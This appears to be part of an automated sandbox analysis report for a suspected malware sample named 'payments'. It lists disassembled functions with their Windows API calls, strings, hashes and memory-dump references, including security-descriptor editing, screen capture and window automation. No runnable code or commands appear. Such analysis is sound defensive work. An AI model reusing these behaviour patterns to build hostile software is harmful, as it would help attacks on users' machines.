                                                                                                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                                                          • API String ID: 3730832054-3931177956
                                                                                                                          • Opcode ID: 78fa60b4b20892615da9016f4902a0ac22112f4f48a88666fec137f0db0e9625
                                                                                                                          • Instruction ID: 0efa96ef69f9b09d0859f22e264e6d8a3505b03057bcb462d2ec84617134eca2
                                                                                                                          • Opcode Fuzzy Hash: 78fa60b4b20892615da9016f4902a0ac22112f4f48a88666fec137f0db0e9625
                                                                                                                          • Instruction Fuzzy Hash: CFD10331600215EBCB109F66C884BAEB7B6FF09700F188457E6159F391DB74ED51EBA2
                                                                                                                          Function 00CDD219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00C9936C: __swprintf.LIBCMT ref: 00C993AB
                                                                                                                            • Part of subcall function 00C9936C: __itow.LIBCMT ref: 00C993DF
                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 00CDD292
                                                                                                                          • GetDriveTypeW.KERNEL32 ref: 00CDD2DF
                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDD327
                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDD35E
                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00CDD38C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                          • API String ID: 1148790751-4113822522
                                                                                                                          • Opcode ID: fe2200eec7ca842cddaf0d07874ba2e48393aa4b24e34a8d9cb12c636bfd07e7
                                                                                                                          • Instruction ID: c3110cd2acc3cfcfe1120eba77a15cb82ef4216b29e573de66097464a5b6167b
                                                                                                                          • Opcode Fuzzy Hash: fe2200eec7ca842cddaf0d07874ba2e48393aa4b24e34a8d9cb12c636bfd07e7
                                                                                                                          • Instruction Fuzzy Hash: 80511A71504305AFC700EF24C99296EB7F4EF98758F10885DF896672A1DB31EE0ADB92
                                                                                                                          Function 00CD26BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00D03973,00000016,0000138C,00000016,?,00000016,00D2DDB4,00000000,?), ref: 00CD26F1
                                                                                                                          • LoadStringW.USER32(00000000,?,00D03973,00000016), ref: 00CD26FA
                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00D03973,00000016,0000138C,00000016,?,00000016,00D2DDB4,00000000,?,00000016), ref: 00CD271C
                                                                                                                          • LoadStringW.USER32(00000000,?,00D03973,00000016), ref: 00CD271F
                                                                                                                          • __swprintf.LIBCMT ref: 00CD276F
                                                                                                                          • __swprintf.LIBCMT ref: 00CD2780
                                                                                                                          • _wprintf.LIBCMT ref: 00CD2829
                                                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CD2840
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                          • API String ID: 618562835-2268648507
                                                                                                                          • Opcode ID: 5da045cf81735ac94379b60415ee249f4451e2f10537b266693deaa87159ac7b
                                                                                                                          • Instruction ID: c3d906660b944bda93d17711a34503726568e67c54df90de81faabfae62598a0
                                                                                                                          • Opcode Fuzzy Hash: 5da045cf81735ac94379b60415ee249f4451e2f10537b266693deaa87159ac7b
                                                                                                                          • Instruction Fuzzy Hash: D8413F72800218BBCF15FBE4DD9ADEEB778AF15340F100065B602B6192EA706F59EB60
                                                                                                                          Function 00CDD0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CDD0D8
                                                                                                                          • __swprintf.LIBCMT ref: 00CDD0FA
                                                                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CDD137
                                                                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CDD15C
                                                                                                                          • _memset.LIBCMT ref: 00CDD17B
                                                                                                                          • _wcsncpy.LIBCMT ref: 00CDD1B7
                                                                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CDD1EC
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CDD1F7
                                                                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00CDD200
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00CDD20A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                          • String ID: :$\$\??\%s
                                                                                                                          • API String ID: 2733774712-3457252023
                                                                                                                          • Opcode ID: 4ea3118f262efc1c32e61ad1f56b719dd9e2e78fd1fc43da12376496a08c2375
                                                                                                                          • Instruction ID: 7e6112a56314365fc766b44064b3a44cc39ea4ca4d512a4917485ef8435d5f34
                                                                                                                          • Opcode Fuzzy Hash: 4ea3118f262efc1c32e61ad1f56b719dd9e2e78fd1fc43da12376496a08c2375
                                                                                                                          • Instruction Fuzzy Hash: E83161B2900219ABDB219FA4DC49FEB77BDEF89740F1041A6F619D2260EB7097458B24
                                                                                                                          Function 00CE05F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • __wsplitpath.LIBCMT ref: 00CE076F
                                                                                                                          • _wcscat.LIBCMT ref: 00CE0787
                                                                                                                          • _wcscat.LIBCMT ref: 00CE0799
                                                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00CE07AE
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE07C2
                                                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 00CE07DA
                                                                                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00CE07F4
                                                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00CE0806
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                          • String ID: *.*
                                                                                                                          • API String ID: 34673085-438819550
                                                                                                                          • Opcode ID: f1c00e04ad5d0af482b32a49f93294d17051c46c32e47d88e2dc838a68f30633
                                                                                                                          • Instruction ID: bfd65033cf294ee93d80d0498cf2e3daab1371011213cd1e9726279b26267bab
                                                                                                                          • Opcode Fuzzy Hash: f1c00e04ad5d0af482b32a49f93294d17051c46c32e47d88e2dc838a68f30633
                                                                                                                          • Instruction Fuzzy Hash: 3E81B4715043819FCB24DF26C845AAEB3E8FBC4314F24882EF895C7251E774DA95CB92
                                                                                                                          Function 00CFEEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CAB34E: GetWindowLongW.USER32(?,000000EB), ref: 00CAB35F
                                                                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00CFEF3B
                                                                                                                          • GetFocus.USER32 ref: 00CFEF4B
                                                                                                                          • GetDlgCtrlID.USER32(00000000), ref: 00CFEF56
                                                                                                                          • _memset.LIBCMT ref: 00CFF081
                                                                                                                          • GetMenuItemInfoW.USER32 ref: 00CFF0AC
                                                                                                                          • GetMenuItemCount.USER32(00000000), ref: 00CFF0CC
                                                                                                                          • GetMenuItemID.USER32(?,00000000), ref: 00CFF0DF
                                                                                                                          • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 00CFF113
                                                                                                                          • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 00CFF15B
                                                                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00CFF193
                                                                                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00CFF1C8
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                          • String ID: 0
                                                                                                                          • API String ID: 1296962147-4108050209
                                                                                                                          • Opcode ID: 2cff7c6d25d77627057d1f92c5bcd17ef7a65671398ed06910132fcd341e8a96
                                                                                                                          • Instruction ID: 54b4c508a0fcf3ffdfd53c4191f23f6b2cf5d96756cb47d3bfa6939a9b9dd206
                                                                                                                          • Opcode Fuzzy Hash: 2cff7c6d25d77627057d1f92c5bcd17ef7a65671398ed06910132fcd341e8a96
                                                                                                                          • Instruction Fuzzy Hash: 3A814A71508309AFD760CF15C884ABBBBE5EF88314F10852DFAA597291DB70D906DB62
                                                                                                                          Function 00CCA867 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00CCABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00CCABD7
                                                                                                                            • Part of subcall function 00CCABBB: GetLastError.KERNEL32(?,00CCA69F,?,?,?), ref: 00CCABE1
                                                                                                                            • Part of subcall function 00CCABBB: GetProcessHeap.KERNEL32(00000008,?,?,00CCA69F,?,?,?), ref: 00CCABF0
                                                                                                                            • Part of subcall function 00CCABBB: HeapAlloc.KERNEL32(00000000,?,00CCA69F,?,?,?), ref: 00CCABF7
                                                                                                                            • Part of subcall function 00CCABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00CCAC0E
                                                                                                                            • Part of subcall function 00CCAC56: GetProcessHeap.KERNEL32(00000008,00CCA6B5,00000000,00000000,?,00CCA6B5,?), ref: 00CCAC62
                                                                                                                            • Part of subcall function 00CCAC56: HeapAlloc.KERNEL32(00000000,?,00CCA6B5,?), ref: 00CCAC69
                                                                                                                            • Part of subcall function 00CCAC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00CCA6B5,?), ref: 00CCAC7A
                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00CCA8CB
                                                                                                                          • _memset.LIBCMT ref: 00CCA8E0
                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00CCA8FF
                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00CCA910
                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00CCA94D
                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00CCA969
                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00CCA986
                                                                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00CCA995
                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00CCA99C
                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00CCA9BD
                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00CCA9C4
                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00CCA9F5
                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00CCAA1B
                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00CCAA2F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3996160137-0
                                                                                                                          • Opcode ID: da54630b117dea52315716a90d27cdadc80527c3ed2e56458b9ea8c33570cfb5
                                                                                                                          • Instruction ID: 7dd95d7c0e03ec45e136bd1238c93a261566c6ed28367bad3695178b5d609815
                                                                                                                          • Opcode Fuzzy Hash: da54630b117dea52315716a90d27cdadc80527c3ed2e56458b9ea8c33570cfb5
                                                                                                                          • Instruction Fuzzy Hash: C1511AB1900209ABDF14DF94DD49EEEBB7AFF08304F148119E925E6290DB35DA06DB61
                                                                                                                          Function 00CE9DC1 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • GetDC.USER32(00000000), ref: 00CE9E36
                                                                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00CE9E42
                                                                                                                          • CreateCompatibleDC.GDI32(?), ref: 00CE9E4E
                                                                                                                          • SelectObject.GDI32(00000000,?), ref: 00CE9E5B
                                                                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00CE9EAF
                                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00CE9EEB
                                                                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00CE9F0F
                                                                                                                          • SelectObject.GDI32(00000006,?), ref: 00CE9F17
                                                                                                                          • DeleteObject.GDI32(?), ref: 00CE9F20
                                                                                                                          • DeleteDC.GDI32(00000006), ref: 00CE9F27
                                                                                                                          • ReleaseDC.USER32(00000000,?), ref: 00CE9F32
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 2598888154-3887548279
                                                                                                                          • Opcode ID: 8b5cd4a9822962b1c2d36927b23e846af47f81c4848a6c3374d6ecafb55136ee
                                                                                                                          • Instruction ID: 47b126a327ba0d73b3b39214dfa5b648a3abf7906acfdc7ed11cf1b3a8a731a8
                                                                                                                          • Opcode Fuzzy Hash: 8b5cd4a9822962b1c2d36927b23e846af47f81c4848a6c3374d6ecafb55136ee
                                                                                                                          • Instruction Fuzzy Hash: 56513975900349AFCB25CFA9CC85EAEBBBAEF48310F14841DF95AA7350C735A941CB60
                                                                                                                          Function 00CDCC5C Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 155COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LoadString__swprintf_wprintf
                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                          • API String ID: 2889450990-2391861430
                                                                                                                          • Opcode ID: 7db7acfdf5d4af6b60ed0b495c24d202ce2d898796f10696aa6e4f88d80d6bce
                                                                                                                          • Instruction ID: b768b47bc8b6f62a87b694d3128a62935be9daec76eb1437502f8d4a0696ce4e
                                                                                                                          • Opcode Fuzzy Hash: 7db7acfdf5d4af6b60ed0b495c24d202ce2d898796f10696aa6e4f88d80d6bce
                                                                                                                          • Instruction Fuzzy Hash: 81515E72800209BBCF15EBA4CD9AEEEB779AF14304F100166F515721A2EB316F59EB61
                                                                                                                          Function 00CDCA48 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 151COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: LoadString__swprintf_wprintf
                                                                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                          • API String ID: 2889450990-3420473620
                                                                                                                          • Opcode ID: ce8b668ea6a516b083bcbeb141c0c800cf815ea759abb4bdbe547bdd0904b8de
                                                                                                                          • Instruction ID: 16dd04fd839cb6715ee6ba44688c2fb1bd42fd88516c3b3385eb59115d2e3e90
                                                                                                                          • Opcode Fuzzy Hash: ce8b668ea6a516b083bcbeb141c0c800cf815ea759abb4bdbe547bdd0904b8de
                                                                                                                          • Instruction Fuzzy Hash: 03515C32900209BBCF15EBE4CD86EEEB778AF14344F100066B605721A2EB716F59EF61
                                                                                                                          Function 00CD778F Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • timeGetTime.WINMM ref: 00CD7794
                                                                                                                            • Part of subcall function 00CADC38: timeGetTime.WINMM(?,753DB400,00D058AB), ref: 00CADC3C
                                                                                                                          • Sleep.KERNEL32(0000000A), ref: 00CD77C0
                                                                                                                          • EnumThreadWindows.USER32(?,Function_00047744,00000000), ref: 00CD77E4
                                                                                                                          • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00CD7806
                                                                                                                          • SetActiveWindow.USER32 ref: 00CD7825
                                                                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00CD7833
                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00CD7852
                                                                                                                          • Sleep.KERNEL32(000000FA), ref: 00CD785D
                                                                                                                          • IsWindow.USER32 ref: 00CD7869
                                                                                                                          • EndDialog.USER32(00000000), ref: 00CD787A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                          • String ID: @U=u$BUTTON
                                                                                                                          • API String ID: 1194449130-2582809321
                                                                                                                          • Opcode ID: 465b2c758c7aabdd87badbbfb90a08634b83b266318455234dce7bc34863707b
                                                                                                                          • Instruction ID: 28e467057f4b2f1fcc55cb058130a481bb1a09692b3ce2e3bcae7f41ef80ca6e
                                                                                                                          • Opcode Fuzzy Hash: 465b2c758c7aabdd87badbbfb90a08634b83b266318455234dce7bc34863707b
                                                                                                                          • Instruction Fuzzy Hash: 16216F74204305BFF7015B60EC89A663F6AFB0538AF404166FA16D23A2EF718D01EA34
                                                                                                                          Function 00CD55BD Relevance: 19.7, APIs: 13, Instructions: 213windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 00CD55D7
                                                                                                                          • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00CD5664
                                                                                                                          • GetMenuItemCount.USER32(00D51708), ref: 00CD56ED
                                                                                                                          • DeleteMenu.USER32(00D51708,00000005,00000000,000000F5,?,?), ref: 00CD577D
                                                                                                                          • DeleteMenu.USER32(00D51708,00000004,00000000), ref: 00CD5785
                                                                                                                          • DeleteMenu.USER32(00D51708,00000006,00000000), ref: 00CD578D
                                                                                                                          • DeleteMenu.USER32(00D51708,00000003,00000000), ref: 00CD5795
                                                                                                                          • GetMenuItemCount.USER32(00D51708), ref: 00CD579D
                                                                                                                          • SetMenuItemInfoW.USER32(00D51708,00000004,00000000,00000030), ref: 00CD57D3
                                                                                                                          • GetCursorPos.USER32(?), ref: 00CD57DD
                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 00CD57E6
                                                                                                                          • TrackPopupMenuEx.USER32(00D51708,00000000,?,00000000,00000000,00000000), ref: 00CD57F9
                                                                                                                          • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00CD5805
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.1358665668.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.1358646713.0000000000C90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D1D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358726019.0000000000D3E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358769798.0000000000D4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.1358788526.0000000000D54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_c90000_payments.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3993528054-0
                                                                                                                          • Opcode ID: a72dabc9df532bb9cc57db163e1eaf436078e90d5fb25fe978761a8537b4bd82
                                                                                                                          • Instruction ID: 897498a5451c066da47fb1cdcf7313f167d285cf524d22736395432809c99350
